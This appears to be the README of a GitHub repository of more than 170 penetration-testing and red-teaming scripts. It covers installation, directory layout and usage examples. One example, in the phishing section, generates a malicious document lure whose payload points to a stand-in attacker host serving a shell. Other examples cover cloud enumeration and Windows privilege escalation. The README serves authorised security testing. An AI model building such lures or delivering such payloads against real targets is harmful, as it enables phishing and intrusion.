A collection of more than 170 tools, scripts, cheatsheets and other loot that I've developed over the years for Red Teaming/Pentesting/IT Security audit purposes.

redteammember/Penetration-Testing-Tools

Penetration‑Testing‑Tools

A curated collection of 170+ tools, scripts and cheat‑sheets for penetration testing, red teaming and security auditing — collected and maintained by Mariusz Banach (@mariuszbit).


📑 Table of Contents

  1. About the repository
  2. Quick start
  3. Directory structure
  4. Minimum requirements
  5. Clone & update
  6. Finding the right tool
  7. Usage examples
  8. Contributing
  9. License
  10. Disclaimer
  11. Contact & credits

About the repository

This repository is the outcome of years of hands‑on offensive security work. Each script was born from a real‑world need to automate repetitive tasks, validate exploitation hypotheses or bypass defensive controls. All materials are provided for legal use only — test only systems for which you have written permission.

Key facts:

  • 170+ standalone utilities and cheat‑sheets
  • 9 major topical directories (clouds, linux, windows, …)
  • 85 % of the code is Python and PowerShell
  • released under the permissive MIT license

Quick start

1 · Install dependencies

Most scripts are portable and require no global installation. All you need is a recent:

  • Python ⩾ 3.8
  • PowerShell ⩾ 5.1 / 7.x
  • Standard Linux utilities

2 · Clone the repository with submodules

git clone --recurse-submodules https://github.com/mgeeky/Penetration-Testing-Tools.git
cd Penetration-Testing-Tools

3 · Run your first script

cd red-teaming/active-directory
python3 ADCollector.py -h   # show arguments help

Directory structure

| Directory | Description |
|---|---|
| clouds/ | Auditing tools for AWS, Azure, GCP |
| file-formats/ | File‑format fuzzers & analyzers (OLE, PDF, ZIP, …) |
| linux/ | Linux privilege‑escalation and post‑exploitation utilities |
| networks/ | Network protocol helpers, device emulators, scanners |
| others/ | Miscellaneous scripts not covered elsewhere |
| phishing/ | Email templates, tracking, campaign automation |
| red-teaming/ | Active Directory, C2, AV‑evasion, OPSEC tricks |
| web/ | Web‑app testing helpers, proxy plugins, exploits |
| windows/ | Windows‑specific exploits and post‑exploitation |

Tip: Most directories contain their own README.md or USAGE.txt describing the nuances of the tools inside.


Minimum requirements

| Component | Version | Notes |
|---|---|---|
| Python | 3.8+ | Some scripts use asyncio, f‑strings, etc. |
| PowerShell | 5.1/7+ | PowerShell Core recommended on Linux/macOS |
| Go | 1.21+ | Needed by a handful of utilities under clouds/ |
| gcc/clang | | For building C/C++ PoCs in windows/ and red‑teaming/ |

On Windows, it’s usually easiest to work from WSL 2 + PowerShell Core.


Clone & update

# initial clone
git clone --recurse-submodules https://github.com/mgeeky/Penetration-Testing-Tools.git

# update repository including its submodules
git pull --recurse-submodules

If you don’t intend to modify the code, add --depth=1 to the git clone command to shrink the download size.


Finding the right tool

  1. Search by name/keyword

    git ls-files | grep -i "azure"     # example

  2. Search by language with tokei

    tokei . -l PowerShell

  3. Search by function — look for tags in filenames (enum, privesc, bypass, c2, …).

Pro‑tip: open the repo as a folder in VS Code and use full‑text search (Ctrl+Shift+F).


Usage examples

The snippets below illustrate typical usage. Always read each tool's --help output before running it.

Azure enum session

cd clouds/azure/az-flare
python3 azflare.py --tenant 12345678-90ab-cdef-fedc-ba0987654321 --all

Windows privilege escalation

cd windows/privesc
.\Seatbelt.exe -group=system -outputfile results.txt

Phishing: generate a malicious PDF lure

cd phishing/malicious-doc
python3 generate.py --template invoice.docx --payload https://evil.tld/shell

Contributing

  1. Fork the repo and create a feature branch: git checkout -b my-feature.
  2. Follow existing coding style (PEP 8 for Python, PSScriptAnalyzer for PowerShell).
  3. Add/update the README.md in your directory.
  4. Make sure you do not disclose any confidential data.
  5. Open a Pull Request describing your changes and including usage example(s).

Please read CODE_OF_CONDUCT.md before contributing.


License

The project is distributed under the MIT license. You are free to:

  • use it for private and commercial purposes;
  • modify and redistribute copies;
  • keep links to the original project.

See LICENSE for the full text.


Disclaimer

All scripts and instructions are provided as‑is. The author and contributors accept no liability for any damage caused by using this code. Use these tools only for legal purposes and only against systems you own or for which you have explicit permission.


Contact & credits

  • Author: Mariusz Banach / mgeeky
    Twitter: @mariuszbit
    Email: mb[at]binary‑offensive.com
  • Support the project: Buy Me a Coffee ☕
  • Huge thanks to all commit authors and the community for ideas and feedback!

Happy testing and safe bugs! 🚀

Languages

  • PowerShell 44.6%
  • Python 44.2%
  • Shell 5.0%
  • Ruby 2.0%
  • VBScript 1.2%
  • C++ 1.0%
  • Other 2.0%